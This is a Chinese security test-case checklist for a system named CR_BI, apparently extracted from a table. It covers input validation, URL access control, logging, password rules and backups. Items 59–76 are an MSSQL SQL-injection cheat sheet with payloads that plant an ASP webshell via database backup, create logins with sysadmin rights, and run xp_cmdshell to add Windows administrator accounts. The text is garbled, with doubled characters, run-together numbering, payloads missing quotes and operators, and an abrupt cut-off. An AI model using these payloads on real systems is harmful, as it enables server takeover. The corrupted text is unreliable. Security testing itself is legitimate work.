安全性测试用例

1、安全性测试用例名名称称：CR_BI安全性测试用例测测试试需需求求点点：文文档档结结构构：编码名称测试环境00综述/010203问题记录/内容/发现问题的描述及附图编编号号测测试试点点测测试试内内容容1检验系统权限设置的有效性（禁用脚本调试，禁用Cookies）输入很大的数（如4,294,967,269），输入很小的数(负数)。2输入超长字符,如对输入文字长度有限制,则尝试超过限制,刚好到达限制字数时有何反应。3输入特殊字符如:!#$%&*()_+:”|；;”,：“”、|+=-.。?/4输入中英文空格，输入字符串中间含空格，输入首尾空格5输入特殊字符串NULL,null，0 x0d 0

2、x0a6输入正常字符串 7输入与要求不同类型的字符，如: 要求输入数字则检查正值,负值,零值（正零，负零）,小数,字母,空值; 要求输入字母则检查输入数字8输入html和javascript代码9某些需登录后或特殊用户才能进入的页面,是否可以通过直接输入网址的方式进入；10对于带参数的网址,恶意修改其参数,(若为数字,则输入字母,或很大的数字,或输入特殊字符等)后打开网址是否出错,是否可以非法进入某些页面；11检验系统URL防范非法入侵的能力某些需登录后或特殊用户才能进入的页面,是否可以通过直接输入网址的方式进入；12对于带参数的网址,恶意修改其参数,(若为数字,则输入字母,或很大的数字,或输

3、入特殊字符等)后打开网址是否出错,是否可以非法进入页面；13搜索页面等url中含有关键字的,输入html代码或JavaScript看是否在页面中显示或执行。14输入善意字符。15检验系统运行的时候是否会记录完整的日志进行详单查询，检测系统是否会记录相应的操作员。16进行详单查询，检测系统是否会记录相应的操作时间。17 进行详单查询，检测系统是否会记录相应的系统的状态。18进行详单查询，检测系统是否会记录相应的操作事项。19进行详单查询，检测系统是否会记录相应的IP地址等。20系统运行的时候是否会记录完整的日志21检验密码验证是否设置密码最小长度22用户名和密码是否可以有空格和回车？23是否允许

4、密码和用户名一致24防恶意注册：可含用自动填表工具自动注册用户？25遗忘密码处理26在读入用户所输入的信息时，根据需要选择是否去掉前后空格27有无缺省的超级用户？28有无超级密码？29密码错误有无限制？30密码复杂性（如规定字符应混有大、小写字母、数字和特殊字符）31登录界面密码输入框中输入密码，页面显示的是 *，右键，查看源文件是否可以看见刚才输入的密码32检验输入验证数据类型（字符串，整型，实数，等）33允许的字符集34最小和最大的长度35是否允许空输入36参数是否是必须的37重复是否允许38数值范围39特定的值（枚举型）40特定的模式（正则表达式）41对Grid、Label、Tree v

5、iew类的输入框未作验证，输入的内容会按照html语法解析出来42限制用户输入值的种类43在读入用户所输入的信息时，根据需要选择是否去掉前后空格44有些读入数据库的字段不支持中间有空格，但用户切实需要输入中间空格，这时要在程序中加以处理45对可能引起致命错误或系统出错的输入字符或动作要加限制或屏蔽46应当注意尽可能避免用户无意录入无效的数据47检验访问控制用于需要验证用户身份以及权限的页面，复制该页面的url地址，关闭该页面以后，查看是否可以直接进入该复制好的地址48例：从一个页面链到另一个页面的间隙可以看到URL地址，直接输入该地址，可以看到自己没有权限的页面信息49排除可能会使应用非正常中

6、止的错误50检验认证请求方式认证和会话数据是否使用POST方式，而非GET方式51登录次数限制52IE回退按钮退出系统后，点击IE回退按钮，能否重新回到系统中53数据备份和恢复是否提供自动备份机制对重要信息进行本地和异地备份；54是否提供恢复重要信息的功能；55是否提供重要网络设备、通信线路和服务器的硬件冗余；56是否提供重要业务系统的本地系统级热备份。57数据库访问限制是否应用IP过滤策略，阻止非法访问58检验是否存在SQL注入SQL注入59;and (select version)0 获得Windows的版本号;and user_name()=dbo 判断当前系统的连接用户是不是sa;an

7、d (select user_name()0 爆当前系统的连接用户;and (select db_name()0 得到当前连接的数据库60mssql的backup创建webshelluse modelcreate table cmd(str image);insert into cmd(str) values ();backup database model to disk=c:l.asp;61添加mssql和系统的帐户;exec master.dbo.sp_addlogin username;-62;exec master.dbo.sp_password null,username,pass

8、word;- 63;exec master.dbo.sp_addsrvrolemember sysadminusername;-64;exec master.dbo.xp_cmdshell net user username password/workstations:*/times:all/passwordchg:yes/passwordreq:yes /active:yes /add;-65;exec master.dbo.xp_cmdshell net user username password/add;- 66;exec master.dbo.xp_cmdshell net loca

9、lgroupadministrators username /add;- 67测试权限结构（mssql）;and 1=(select IS_SRVROLEMEMBER(sysadmin);-;and 1=(select IS_SRVROLEMEMBER(serveradmin);-;and 1=(select IS_SRVROLEMEMBER(setupadmin);-;and 1=(select IS_SRVROLEMEMBER(securityadmin);-;and 1=(select IS_SRVROLEMEMBER(diskadmin);-;and 1=(select IS_SRVR

10、OLEMEMBER(bulkadmin);-;and 1=(select IS_MEMBER(db_owner);-68判断是否有注入;and 1=1 ;and 1=269判断是否是mssql ;and user070注入参数是字符and 查询条件 and =71搜索时没过滤参数的and 查询条件 and %25=72判断数据库系统;and (select count(*) from sysobjects)0 mssql;and (select count(*) from msysobjects)0 access73数据库 ;and (select Count(*) from 数据库名)074

11、字段 ;and (select Count(字段名) from 数据库名)075字段中记录长度 ;and (select top 1 len(字段名) from数据库名)076(1)字段的ascii值（access）;and (select top 1 asc(mid(字段名,1,1) from 数据库名)0(2)字段的ascii值（mssql）;and (select top 1 unicode(substring(字段名,1,1) from 数据库名)0检验是否存在SQL注入预预期期结结果果实实际际结结果果输入错误。输入过长输入错误。输入错误。输入错误。输入的正确，成功登陆系统。输入错误。输入错误。系统权限设置是有效的。输入错误。不可以直接通过直接输入网址的方式进入对于带参数的网址,恶意修改其参数,(若为数字,则输入字母,或很大的数字,或输入特殊字符等)后打开网址出错，不可以非法进入页面。输入html代码或JavaScript看是不会在页面中显示或执行。 正常进入页面。系统会记录相应的操作员。系统会记录相应的操作时间。系统会记录相应的系统的状态。系统会